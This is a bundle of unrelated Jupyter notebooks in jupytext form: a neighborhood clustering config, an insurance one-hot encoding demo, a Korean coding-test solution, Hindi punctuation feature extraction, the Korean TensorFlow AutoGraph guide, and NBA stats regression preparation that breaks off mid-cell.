    # Racial/ethnic composition variables used as clustering features.
    'variables': ["p_nonhisp_white_persons",
                  "p_nonhisp_black_persons",
                  "p_hispanic_persons",
                  "p_native_persons",
                  "p_asian_persons",
                  ],
    'Sequence': False,
    # optional visualization below.
    #'Index_of_neighborhood_change': True, #choropleth map: Maps representing index of neighborhood Change
    'Maps_of_neighborhood': True,  #choropleth map: Maps representing clustering result
    #'Distribution_INC1': True, #density chart: INC changes as the map extent changes
    #'Distribution_INC2_different_period': True, #density chart: INC changes by different years
    #'Distribution_INC2_different_cluster': True, #density chart: INC changes by different clusters
    'Temporal_change_in_neighborhoods': True,  #stacked chart: Temporal Change in Neighborhoods over years
    #'Parallel_Categories_Diagram_in_neighborhoods': True,
    #'Chord_Diagram_in_neighborhoods': True,
}
# Render the clustering visualization, then dump the run log.
Aspatial_Clustering_viz(param)
Aspatial_Clustering_log()
|
Categorical_Data_Vis/.ipynb_checkpoints/GEOSNAP2NAM1-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# load libraries
import numpy as np
import pandas as pd
from sklearn.preprocessing import OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.model_selection import cross_val_score
from sklearn.tree import DecisionTreeRegressor
# -
# Load the raw insurance-claims table.
df = pd.read_csv('insurance_claims.csv')
# Notebook inspection of schema and summary statistics.
df.columns
df.dtypes
df.head()
df.describe(include='all')
# ## One hot encoding
# Drop the identifier and the target column, then one-hot encode all
# remaining categorical (object-dtype) columns.
df_1 = df.drop(['CustomerID','TotalClaimAmount'], axis=1)
one_hot_encoded_training_predictors = pd.get_dummies(df_1)
one_hot_encoded_training_predictors
# Mean Absolute Error (MAE)
def get_mae(X, y):
    """Return the cross-validated mean absolute error of a
    DecisionTreeRegressor(random_state=131) fit on (X, y).

    sklearn reports 'neg_mean_absolute_error' as a negative score by
    convention, so the sign is flipped to yield a positive MAE.
    """
    model = DecisionTreeRegressor(random_state=131)
    neg_mae_scores = cross_val_score(model, X, y,
                                     scoring='neg_mean_absolute_error')
    return -1 * neg_mae_scores.mean()
# Baseline predictors: drop the categorical columns entirely.
predictors_without_categoricals = df_1.select_dtypes(exclude=['object'])
predictors_without_categoricals
target = df['TotalClaimAmount']
# Compare MAE with categoricals dropped vs. one-hot encoded.
mae_without_categoricals = get_mae(predictors_without_categoricals, target)
mae_without_categoricals
mae_one_hot_encoded = get_mae(one_hot_encoded_training_predictors, target)
mae_one_hot_encoded
print('Mean Absolute Error when Dropping Categoricals: ' + str(int(mae_without_categoricals)))
print('Mean Absolute Error with One-Hot Encoding: ' + str(int(mae_one_hot_encoded)))  # fixed typo: "Abslute"
# Keep the encoded frame and its column list for downstream modeling.
df_1 = one_hot_encoded_training_predictors
features = list(df_1.columns)
features
|
projects/predictions/ml_python_onehotencoding_1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## 2021년 6월 7일 월요일
# ### Programmers - 2개 이하로 다른 비트 (Python)
# ### 문제 : https://programmers.co.kr/learn/courses/30/lessons/77885
# ### 블로그 : https://somjang.tistory.com/entry/Programmers-2%EA%B0%9C-%EC%9D%B4%ED%95%98%EB%A1%9C-%EB%8B%A4%EB%A5%B8-%EB%B9%84%ED%8A%B8-Python
# ### Solution
def solution(numbers):
    """For each number, return the smallest larger value whose binary
    representation differs from it in at most two bits.

    Even numbers: the lowest bit is 0, so setting it (i.e. +1) changes
    exactly one bit. Odd numbers: pad with a leading zero so a 0 bit is
    guaranteed, set the rightmost 0 and clear the 1 just to its right.
    """
    results = []
    for num in numbers:
        if num % 2 == 0:
            # Even: flip the final bit from 0 to 1.
            bits = list(bin(num)[2:])
            bits[-1] = "1"
        else:
            # Odd: leading-zero pad, then swap the rightmost "01" to "10".
            padded = "0" + bin(num)[2:]
            zero_idx = padded.rfind("0")
            bits = list(padded)
            bits[zero_idx], bits[zero_idx + 1] = "1", "0"
        results.append(int("".join(bits), 2))
    return results
|
DAY 301 ~ 400/DAY388_[Programmers] 2개 이하로 다른 비트 (Python).ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pickle
import nltk
files = ["bhairav", "dharamveer", "premchand", "sharatchandra", "vibhooti"]
# Per-piece 11-element punctuation count vectors, with a parallel list of
# author labels (one entry per text piece).
piece_frequencies = []
piece_author = []
for file_name in files:
    # Each pickle holds the list of text pieces for one author.
    pickle_file = open("../pickles/author_splits/" + file_name + ".pkl" , "rb")
    split_text = pickle.load(pickle_file)
    pickle_file.close()
    for text in split_text:
        # Counts, in order: danda (।), ., ,, :, ;, ?, !, -, curly quote,
        # straight quote, double quote.
        punctuation_frequency = [0] * 11
        punctuation_frequency[0] = text.count('।')
        punctuation_frequency[1] = text.count('.')
        punctuation_frequency[2] = text.count(',')
        punctuation_frequency[3] = text.count(':')
        punctuation_frequency[4] = text.count(';')
        punctuation_frequency[5] = text.count('?')
        punctuation_frequency[6] = text.count('!')
        punctuation_frequency[7] = text.count('-')
        punctuation_frequency[8] = text.count("’")
        punctuation_frequency[9] = text.count("'")
        punctuation_frequency[10] = text.count('"')
        piece_frequencies.append(punctuation_frequency)
        piece_author.append(file_name)
# [labels, features] pair persisted below for downstream classification.
feature_vector = [piece_author, piece_frequencies]
# -
pickle_file = open("../pickles/feature_vectors/punctuation/punctuation.pkl" , "wb")
pickle.dump(feature_vector, pickle_file)
pickle_file.close()
|
feature_extraction/punctuation_frequencies.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] colab_type="text" id="Jxv6goXm7oGF"
# ##### Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# + colab_type="code" id="llMNufAK7nfK" colab={}
#@title Licensed under the Apache License, Version 2.0 (the "License"); { display-mode: "form" }
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# + [markdown] colab_type="text" id="8Byow2J6LaPl"
# # 텐서플로 2.0의 tf.function과 오토그래프 (AutoGraph)
# + [markdown] colab_type="text" id="kGXS3UWBBNoc"
# <table class="tfo-notebook-buttons" align="left">
# <td>
# <a target="_blank" href="https://www.tensorflow.org/beta/guide/autograph"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />TensorFlow.org 에서 보기</a>
# </td>
# <td>
# <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ko/beta/guide/autograph.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />구글 코랩(Google Colab)에서 실행하기</a>
# </td>
# <td>
# <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ko/beta/guide/autograph.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />깃헙(GitHub) 소스 보기</a>
# </td>
# </table>
# + [markdown] id="GQLxpmF2_AvM" colab_type="text"
# Note: 이 문서는 텐서플로 커뮤니티에서 번역했습니다. 커뮤니티 번역 활동의 특성상 정확한 번역과 최신 내용을 반영하기 위해 노력함에도
# 불구하고 [공식 영문 문서](https://www.tensorflow.org/?hl=en)의 내용과 일치하지 않을 수 있습니다.
# 이 번역에 개선할 부분이 있다면
# [tensorflow/docs](https://github.com/tensorflow/docs) 깃헙 저장소로 풀 리퀘스트를 보내주시기 바랍니다.
# 문서 번역이나 리뷰에 참여하려면
# [<EMAIL>](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko)로
# 메일을 보내주시기 바랍니다.
# + [markdown] colab_type="text" id="CydFK2CL7ZHA"
# TF 2.0 버전은 즉시 실행 (eager execution)의 편리함과 TF 1.0의 성능을 합쳤습니다. 이러한 결합의 중심에는 `tf.function` 이 있는데, 이는 파이썬 문법의 일부를 이식 가능하고 높은 성능의 텐서플로 그래프 코드로 변환시켜줍니다.
#
# `tf.function`의 멋지고 새로운 특징은 오토그래프 (AutoGraph)입니다. 이는 자연스러운 파이썬 문법을 활용해서 그래프 코드를 작성할 수 있도록 돕습니다. 오토그래프로 사용할 수 있는 파이썬 특징들의 목록을 보려면 [오토그래프 지원 범위](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/python/autograph/LIMITATIONS.md)를 참고하세요. `tf.function`에 관한 더 자세한 내용을 확인하려면 RFC [TF 2.0: Functions, not Sessions](https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md)을 참고하세요. 오토그래프에 대한 더 자세한 내용은 `tf.autograph`를 참고하세요.
#
# 본 튜토리얼은 `tf.function`와 오토그래프의 기초적인 특징에 대해서 설명할 것입니다.
# + [markdown] colab_type="text" id="n4EKOpw9mObL"
# ## 설정
#
# 텐서플로 2.0 프리뷰 나이틀리 (Preview Nightly) 버전을 임포트(import)하고, TF 2.0 모드를 설정합니다:
# + colab_type="code" id="V9oECvVSI1Kj" colab={}
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
# + colab_type="code" id="mT7meGqrZTz9" colab={}
# !pip install tensorflow==2.0.0-beta1
import tensorflow as tf
# + [markdown] colab_type="text" id="77AsVr1GGtBP"
# ## `tf.function` 데코레이터
#
# `tf.function`을 함수에 붙여줄 경우, 여전히 다른 일반 함수들처럼 사용할 수 있습니다. 하지만 그래프 내에서 컴파일 되었을 때는 더 빠르게 실행하고, GPU나 TPU를 사용해서 작동하고, 세이브드모델(SavedModel)로 내보내는 것이 가능해집니다.
# + colab_type="code" id="FhIg7-z6HNWj" colab={}
@tf.function
def simple_nn_layer(x, y):
    # relu(x @ y); tf.function compiles this into a TF graph.
    return tf.nn.relu(tf.matmul(x, y))


x = tf.random.uniform((3, 3))
y = tf.random.uniform((3, 3))
simple_nn_layer(x, y)
# + [markdown] colab_type="text" id="U-LAE4pMNR9g"
# 데코레이터를 붙인 결과를 확인해보면, 텐서플로 런타임시의 모든 상호작용들을 다룰 수 있다는 것을 알 수 있습니다.
# + colab_type="code" id="q4t2iuS7Nqc0" colab={}
simple_nn_layer
# + [markdown] colab_type="text" id="DqeefLGNXjZQ"
# 만일 여러분의 코드가 여러 함수들을 포함하고 있다면, 그것들에 모두 데코레이터를 붙일 필요는 없습니다. 데코레이터가 붙은 함수로부터 호출된 모든 함수들은 그래프 모드에서 동작합니다.
# + colab_type="code" id="3VGF7tlVXiZY" colab={}
def linear_layer(x):
    # No decorator needed: functions called from a tf.function-decorated
    # caller run in graph mode too.
    return 2 * x + 1


@tf.function
def deep_net(x):
    return tf.nn.relu(linear_layer(x))


deep_net(tf.constant((1, 2, 3)))
# + [markdown] colab_type="text" id="yQvg6ZSKWyqE"
# 작은 연산들을 많이 포함한 그래프의 경우 함수들은 즉시 실행 코드 (eager code) 보다 더 빠르게 동작합니다. 하지만 무거운 연산들을 조금 포함한 그래프의 경우 (컨볼루션 등), 그렇게 빠른 속도 향상은 기대하기 어렵습니다.
#
# + colab_type="code" id="0EL6lVwEWuFo" colab={}
import timeit

conv_layer = tf.keras.layers.Conv2D(100, 3)


@tf.function
def conv_fn(image):
    return conv_layer(image)


image = tf.zeros([1, 200, 200, 100])
# Warm up: build the layer variables / trace the function before timing.
conv_layer(image); conv_fn(image)
print("컨볼루션 즉시 실행:", timeit.timeit(lambda: conv_layer(image), number=10))
print("컨볼루션 함수:", timeit.timeit(lambda: conv_fn(image), number=10))
print("컨볼루션의 성능에는 큰 차이가 없다는 것을 확인할 수 있습니다")
# + colab_type="code" id="L4zj-jpH0jKH" colab={}
lstm_cell = tf.keras.layers.LSTMCell(10)


@tf.function
def lstm_fn(input, state):
    return lstm_cell(input, state)


input = tf.zeros([10, 10])
state = [tf.zeros([10, 10])] * 2
# Warm up: build the cell variables / trace the function before timing.
lstm_cell(input, state); lstm_fn(input, state)
print("lstm 즉시 실행:", timeit.timeit(lambda: lstm_cell(input, state), number=10))
print("lstm 함수:", timeit.timeit(lambda: lstm_fn(input, state), number=10))
# + [markdown] colab_type="text" id="ohbSnA79mcJV"
# ## 파이썬의 제어 흐름 사용하기
#
# `tf.function` 내에서 데이터 기반 제어 흐름을 사용할 때, 파이썬의 제어 흐름 문을 사용할 수 있고, 오토그래프 기능은 그것들을 모두 적절한 텐서플로 연산으로 변환할 수 있습니다. 예를 들어, `if` 문은 `Tensor`를 기반으로 작동해야할 때 `tf.cond()` 로 변환될 수 있습니다.
#
# 아래 예시에서, `x`는 `Tensor`이지만 `if`문이 예상한대로 정상 작동합니다:
# + colab_type="code" id="aA3gOodCBkOw" colab={}
@tf.function
def square_if_positive(x):
    # AutoGraph converts this data-dependent `if` on a Tensor into tf.cond.
    if x > 0:
        x = x * x
    else:
        x = 0
    return x


print('square_if_positive(2) = {}'.format(square_if_positive(tf.constant(2))))
print('square_if_positive(-2) = {}'.format(square_if_positive(tf.constant(-2))))
# + [markdown] colab_type="text" id="GMiCUkdyoq98"
# Note: 위의 예시는 스칼라값으로 간단한 조건절을 사용하였습니다. 하지만 실제 코드에서는 <a href="#batching">배치(Batching)</a> 가 주로 사용됩니다.
# + [markdown] colab_type="text" id="m-jWmsCmByyw"
# 오토그래프는 기본적인 파이썬 문인 `while`, `for`, `if`, `break`, `continue`, `return`과 네스팅(nesting)을 지원합니다. 이는 `Tensor` 표현을 `while`과 `if` 문의 조건 부분에서 사용하거나 `for` 루프에서 `Tensor`를 반복할 수 있다는 것을 의미합니다.
# + colab_type="code" id="toxKBOXbB1ro" colab={}
@tf.function
def sum_even(items):
    # Sum of the even entries of a 1-D tensor. AutoGraph lowers the
    # for/if/continue combination into graph control flow — that is the point
    # of this example.
    s = 0
    for c in items:
        if c % 2 > 0:
            continue
        s += c
    return s
sum_even(tf.constant([10, 12, 15, 20]))
# + [markdown] colab_type="text" id="AtDaLrbySw4j"
# 또한 오토그래프는 고급 사용자를 위해 낮은 수준의 API를 제공합니다. 예를 들어, 여러분은 생성된 코드를 확인하기 위해 다음과 같이 작성할 수 있습니다.
# + colab_type="code" id="aRsde3x_SjTQ" colab={}
print(tf.autograph.to_code(sum_even.python_function))
# + [markdown] colab_type="text" id="rvJXCfk8VkLf"
# 다음은 더 복잡한 제어 흐름의 예시입니다:
# + colab_type="code" id="h-Z87IJqVlKl" colab={}
@tf.function
def fizzbuzz(n):
    # Prints Fizz/Buzz/i for 0..n-1 using graph-mode control flow.
    # NOTE(review): classic FizzBuzz also handles multiples of 15
    # ("FizzBuzz"); this simplified example prints only 'Fizz' for them
    # because the %3 branch is tested first.
    msg = tf.constant('')  # NOTE(review): never used — presumably leftover; confirm
    for i in tf.range(n):
        if tf.equal(i % 3, 0):
            tf.print('Fizz')
        elif tf.equal(i % 5, 0):
            tf.print('Buzz')
        else:
            tf.print(i)
fizzbuzz(tf.constant(15))
# + [markdown] colab_type="text" id="h_Y4uC1R1B55"
# ## 케라스와 오토그래프
#
# 오토그래프는 기본적으로 비동적(non-dynamic) 케라스 모델에서 사용 가능합니다. 더 자세한 정보를 원한다면, `tf.keras`를 참고하세요.
# + colab_type="code" id="cR6mpLKP1HLe" colab={}
class CustomModel(tf.keras.models.Model):
    """Keras model whose call() branches on the mean of its input tensor."""

    @tf.function
    def call(self, input_data):
        # Data-dependent branch: AutoGraph converts this to tf.cond in graph
        # mode, which is why it works on non-dynamic Keras models.
        if tf.reduce_mean(input_data) > 0:
            return input_data
        else:
            # Integer inputs use floor division here (e.g. [-2, -4] -> [-1, -2]).
            return input_data // 2
model = CustomModel()
model(tf.constant([-2, -4]))
# + [markdown] colab_type="text" id="NTEvpBK9f8kj"
# ## 부수 효과 (Side effects)
#
# 즉시 실행 모드 (eager mode)처럼 부수 효과를 사용할 수 있습니다. 예를 들면, `tf.function` 내에 있는 `tf.assign`이나 `tf.print`이 있습니다. 또한 부수 효과들은 작업들이 순서대로 실행된다는 것을 보장하기 위해 필수적인 제어 의존성 (control dependency)을 추가합니다.
# + colab_type="code" id="-Wd6i8S9gcuC" colab={}
v = tf.Variable(5)
@tf.function
def find_next_odd():
    # Side effects (variable assignments) inside tf.function get control
    # dependencies added, guaranteeing they execute in program order.
    v.assign(v + 1)
    if tf.equal(v % 2, 0):
        # Landed on an even value — step once more to reach the next odd.
        v.assign(v + 1)
find_next_odd()
v
# + [markdown] colab_type="text" id="4LfnJjm0Bm0B"
# ## 디버깅
#
# `tf.function` 과 오토그래프는 코드를 생성하고 텐서플로 그래프 내에서 해당 코드를 추적함으로써 동작합니다. 이 메커니즘은 아직까지는 `pdb`같은 단계적 (step-by-step) 디버거를 지원하지 않습니다. 하지만 일시적으로 `tf.function` 내에서 즉시 실행 (eager execution)을 가능하게 하는 `tf.config.run_functions_eagerly(True)`을 사용하고 가장 선호하는 디버거를 사용할 수 있습니다:
# + colab_type="code" id="Yci8ve6hmgpF" colab={}
@tf.function
def f(x):
    if x > 0:
        # Try setting a breakpoint here!
        # Example:
        # import pdb
        # pdb.set_trace()
        x = x + 1
    return x
# Fix: use the stable API name. The original called the deprecated
# tf.config.experimental_run_functions_eagerly alias, while the explanatory
# text above already refers to tf.config.run_functions_eagerly(True).
tf.config.run_functions_eagerly(True)
# You can now set breakpoints and step through the code in a debugger.
f(tf.constant(1))
tf.config.run_functions_eagerly(False)
# + [markdown] colab_type="text" id="Em5dzSUOtLRP"
# ### 데이터 다운로드
# + colab_type="code" id="xqoxumv0ssQW" colab={}
def prepare_mnist_features_and_labels(x, y):
    """Scale image pixels into [0, 1] float32 and cast labels to int64."""
    features = tf.cast(x, tf.float32) / 255.0
    labels = tf.cast(y, tf.int64)
    return features, labels
def mnist_dataset():
    """Download MNIST and return a shuffled, batched tf.data pipeline.

    Takes the first 20000 examples, shuffles them, and batches by 100
    (i.e. 200 batches per epoch). Labels/images are normalized by
    prepare_mnist_features_and_labels.
    """
    (x, y), _ = tf.keras.datasets.mnist.load_data()
    ds = tf.data.Dataset.from_tensor_slices((x, y))
    ds = ds.map(prepare_mnist_features_and_labels)
    ds = ds.take(20000).shuffle(20000).batch(100)
    return ds
train_dataset = mnist_dataset()
# + [markdown] colab_type="text" id="znmy4l8ntMvW"
# ### 모델 정의하기
# + colab_type="code" id="ltxyJVWTqNAO" colab={}
# Simple MLP classifier: flatten 28x28 images, two 100-unit ReLU hidden
# layers, and a 10-logit output (no softmax — the loss uses from_logits).
model = tf.keras.Sequential((
    tf.keras.layers.Reshape(target_shape=(28 * 28,), input_shape=(28, 28)),
    tf.keras.layers.Dense(100, activation='relu'),
    tf.keras.layers.Dense(100, activation='relu'),
    tf.keras.layers.Dense(10)))
model.build()
optimizer = tf.keras.optimizers.Adam()
# + [markdown] colab_type="text" id="oeYV6mKnJGMr"
# ### 훈련 (training) 루프 정의하기
# + colab_type="code" id="3xtg_MMhJETd" colab={}
compute_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True)
compute_accuracy = tf.keras.metrics.SparseCategoricalAccuracy()
def train_one_step(model, optimizer, x, y):
    """Run one gradient-descent step and update the running accuracy metric."""
    with tf.GradientTape() as tape:
        logits = model(x)
        loss = compute_loss(y, logits)
    grads = tape.gradient(loss, model.trainable_variables)
    optimizer.apply_gradients(zip(grads, model.trainable_variables))
    compute_accuracy(y, logits)
    return loss
@tf.function
def train(model, optimizer):
    """One epoch over the MNIST pipeline, compiled into a graph by tf.function."""
    train_ds = mnist_dataset()
    step = 0
    loss = 0.0
    # NOTE(review): `accuracy` is never updated — the running accuracy lives
    # in the compute_accuracy metric; this local is returned as 0.0.
    accuracy = 0.0
    for x, y in train_ds:
        step += 1
        loss = train_one_step(model, optimizer, x, y)
        if tf.equal(step % 10, 0):
            # tf.print works inside graphs (a side effect with control deps).
            tf.print('스텝', step, ': 손실', loss, '; 정확도', compute_accuracy.result())
    return step, loss, accuracy
step, loss, accuracy = train(model, optimizer)
print('최종 스텝', step, ': 손실', loss, '; 정확도', compute_accuracy.result())
# + [markdown] colab_type="text" id="SnsumiP6eRYL"
# ## 배치 (Batching)
#
# 실제 적용시에 배치 (batch) 는 성능을 위해 필수적입니다. 오토그래프로 변환하기 가장 좋은 코드는 제어 흐름이 _배치_ 수준에서 결정되는 코드입니다. 만일 제어 흐름이 개별적인 _예제 (example)_ 수준에서 결정된다면, 성능을 유지하기 위해서 배치 API들을 사용해야합니다.
#
# 예를 들어, 파이썬으로 다음과 같은 코드를 작성했다면:
#
# + colab_type="code" id="t31QoERiNccJ" colab={}
def square_if_positive(x):
    """Return a list where each positive element of x is squared; all other
    elements pass through unchanged."""
    result = []
    for value in x:
        if value > 0:
            result.append(value * value)
        else:
            result.append(value)
    return result
square_if_positive(range(-5, 5))
# + [markdown] colab_type="text" id="kSeEJ76uNgwD"
# 텐서플로에서는 다음과 같이 작성하고 싶을 것입니다. (그리고 다음 코드는 실제로 동작합니다!):
#
# + colab_type="code" id="RqR8WzSzNf87" colab={}
@tf.function
def square_if_positive_naive(x):
    # Per-element control flow in graph mode: works, but requires a
    # TensorArray and a loop — compare the vectorized tf.where version below.
    result = tf.TensorArray(tf.int32, size=x.shape[0])
    for i in tf.range(x.shape[0]):
        if x[i] > 0:
            result = result.write(i, x[i] ** 2)
        else:
            result = result.write(i, x[i])
    return result.stack()
square_if_positive_naive(tf.range(-5, 5))
# + [markdown] colab_type="text" id="gTcyWXVGN3gS"
# 하지만 이 경우는 아래와 같이 작성할 수도 있습니다:
#
# + colab_type="code" id="VO2f6x-lNfVj" colab={}
def square_if_positive_vectorized(x):
    """Batch-level equivalent of square_if_positive: elementwise x**2 where
    x > 0, otherwise x, selected with a single tf.where."""
    squared = x ** 2
    return tf.where(x > 0, squared, x)
square_if_positive_vectorized(tf.range(-5, 5))
|
site/ko/guide/autograph.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Libraries
# +
# %matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
# Dependencies and Setup
import time
from pprint import pprint
import requests
from datetime import date, timedelta, datetime
import json
from pprint import pprint
from tqdm import tqdm
from tqdm import tqdm_notebook
# sqlite Dependencies
# ----------------------------------
# Imports the method used for connecting to DBs
from sqlalchemy import create_engine
# Allow us to declare column types
from sqlalchemy import Column, Integer, String, Text, DateTime, Float, Boolean, ForeignKey
from sqlalchemy.orm import relationship
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import Session
import seaborn as sb
# -
from nba_api.stats.endpoints import playercareerstats, drafthistory, commonplayerinfo, playerawards
# -------------
# ## Open combined data from json
# Load the pre-cleaned combined player data (JSON-serialized DataFrame).
with open('./clean_combined_data_for_ml.json') as json_file:
    data = json.load(json_file)
# Default DF. Do not touch.
default = pd.read_json(data).copy()
# All-star selections per player-year; keep only the columns used downstream
# and rename them to match the stats DataFrame's naming scheme.
all_stars = pd.read_csv('../../datasets/NBA_All_Stars_1996-2018.csv')
all_stars = all_stars[['Year','PLAYER','PIE','Selected?']]
all_stars = all_stars.rename(columns={'Year':'YEAR','PLAYER':'PLAYER_NAME', 'Selected?':'ALLSTAR'})
# Injury notes keyed by player and date (also a JSON-serialized DataFrame).
with open('./injury_formatted.json') as json_file:
    injury_data = json.load(json_file)
injuries = pd.read_json(injury_data).copy()
# ## Dataframes for all positions
# #### Key:
#
# * GP: Games Played
# * MIN: Minutes Played
# * FGM: Field Goals Made
# * FGA: Field Goals Attempted
# * FG_PCT: Field Goal Percentage
# * 3PM: 3 Point Field Goals Made
# * 3PA: 3 Point Field Goals Attempted
# * FG3_PCT: 3 Point Field Goals Percentage
# * FTM: Free Throws Made
# * FTA: Free Throws Attempted
# * FT_PCT: Free Throw Percentage
# * OREB: Offensive Rebounds
# * DREB: Defensive Rebounds
# * REB: Rebounds
# * AST: Assists
# * TOV: Turnovers
# * STL: Steals
# * BLK: Blocks
# * PF: Personal Fouls
# * DD2: Double Doubles
# * TD3: Triple Doubles
# * PTS: Points
# * YIL: Year in League
#
default['YIL'].value_counts()
# +
# default
# Keep only seasons with more than 28 games played (filters tiny samples).
default = default[default['GP'] > 28]
# SG
# default = default[(default['POSITION'] == 'SG') & (default['GP'] > 28)]
# Select the modeling columns and order newest seasons first.
default = default[[ 'PLAYER_ID', 'POSITION', 'PLAYER_NAME','PHOTO', 'SEASON_ID','INFLATION','YEAR', 'PLAYER_AGE','YIL','ROUND_NUMBER','OVERALL_PICK', 'GP', 'GS',
                    'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A', 'FG3_PCT', 'FTM', 'FTA',
                    'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL', 'BLK', 'TOV', 'PF',
                    'PTS', 'MIN']].sort_values(by='SEASON_ID', ascending=False)
# Drop duplicated stat lines for the same player-season.
default = default.drop_duplicates(subset=['YIL','SEASON_ID','PLAYER_AGE','GP','GS','MIN'], keep='first').reset_index(drop=True)
pd.set_option('display.max_columns', None)
default = default.copy()
default
# -
default[default['PLAYER_NAME'] == "<NAME>"]
# ------------
# ### Add PER
# PER only gives positives for scoring if you shoot a decent percentage (see picture for breakeven shooting percentages). If a player scores a ton of points but shoots a very low percentage then they would not have a positive Simple PER.
#
# 'Breakeven' Shooting %: 2P = 37.5%, 3P = 28%, FT = 65%.
#
# Equation
# Simple PER is calculated as follows: (2FG Made * 2) - (2FG Attempted *.75) + (3FG Made * 3) – (3FG Attempted * .84) + (FT Made) - (FT Attempted * -.65) + Rebounds + Assists + Blocks + Steals - Turnovers.
# Simple PER per the breakeven percentages stated above (2P 37.5%, 3P 28%,
# FT 65%).
# BUG FIX: the original wrote `- (default['FTA'] * -.65)`, a double negative
# that ADDED 0.65 per free-throw attempt (rewarding missed free throws). The
# 65% breakeven requires subtracting 0.65 per attempt, matching the pattern
# of the FGA*.75 and FG3A*.84 penalty terms.
default['PER'] = ((default['FGM'] * 2) - (default['FGA'] * .75) + (default['FG3M'] * 3) - (default['FG3A'] * .84) + (default['FTM']) - (default['FTA'] * .65) + default['REB'] + default['AST'] + default['BLK'] + default['STL'] - default['TOV'])
# Rank rows by PER, best first.
default = default.sort_values(by='PER', ascending=False).reset_index(drop=True)
# +
default_merged = pd.merge(default, all_stars, how='outer', left_on=['YEAR','PLAYER_NAME'], right_on=['YEAR','PLAYER_NAME'],suffixes=('_left', '_right'))
default_merged = default_merged.drop(columns=['PIE']).dropna(thresh=7)
default_merged[default_merged['PLAYER_NAME'] == "<NAME>"]
# -
# ## Add Injuries
#
# Injuries added to second regression
# Needs Add PER ran first to complete. ^^
injuries[injuries['PLAYER_NAME'] == "<NAME>"]
# +
# Attach prior-year injury notes to each player-season row.
injuries_merged = pd.merge(default_merged, injuries, how="outer", left_on=['YEAR','PLAYER_NAME'], right_on=['Date','PLAYER_NAME'],suffixes=('_left', '_right'))
#
# Rows that came only from the injuries table have no YEAR — backfill it
# from the injury Date, then drop the now-redundant Date column.
injuries_merged['YEAR'] = injuries_merged['YEAR'].fillna(injuries_merged['Date'])
injuries_merged = injuries_merged.drop(columns=['Date'])
injuries_merged = injuries_merged.rename(columns={"Notes":"INJURY_PY"})
# injuries_merged['INJURY_PY'] = injuries_merged['INJURY_PY']
# Drop rows with fewer than 5 non-null values, then zero-fill the remaining gaps.
injuries_merged = injuries_merged.dropna(thresh=5)
injuries_merged = injuries_merged.fillna(0.0)
injuries_merged
# -
# <NAME> 1629029
injuries_merged[injuries_merged['PLAYER_NAME'] == '<NAME>']
injuries_merged.columns
# +
injuries_merged = injuries_merged[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID','INFLATION',
'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN']]
# -
injuries_merged
## Dropping residual due to no correlation with other features. Will use to verify testing.
default_rank = injuries_merged.copy()
default_rank
default_rank['ALLSTAR'] = default_rank['ALLSTAR'].fillna(0)
# Test view
default_rank[default_rank['PLAYER_NAME'] == "<NAME>okic"]
default_rank.columns
default_rank = default_rank[['PLAYER_ID', 'POSITION', 'PLAYER_NAME', 'PHOTO', 'SEASON_ID',
'INFLATION', 'YEAR', 'PLAYER_AGE', 'YIL', 'ROUND_NUMBER',
'OVERALL_PICK', 'GP', 'GS', 'FGM', 'FGA', 'FG_PCT', 'FG3M', 'FG3A',
'FG3_PCT', 'FTM', 'FTA', 'FT_PCT', 'OREB', 'DREB', 'REB', 'AST', 'STL',
'BLK', 'TOV', 'PF', 'PTS', 'PER', 'ALLSTAR', 'INJURY_PY', 'MIN']]
# ### First regression
# +
# dataset = position name
dataset = default_rank
## Multiple Linear Regressions
# Features: columns 8..-2 (YIL onward, per the column order selected above);
# target: the last column (MIN).
X = dataset.iloc[:, 8:-1].values
y = dataset.iloc[:, -1].values
# -
X[0]
## Splitting the dataset into the Training set and Test set
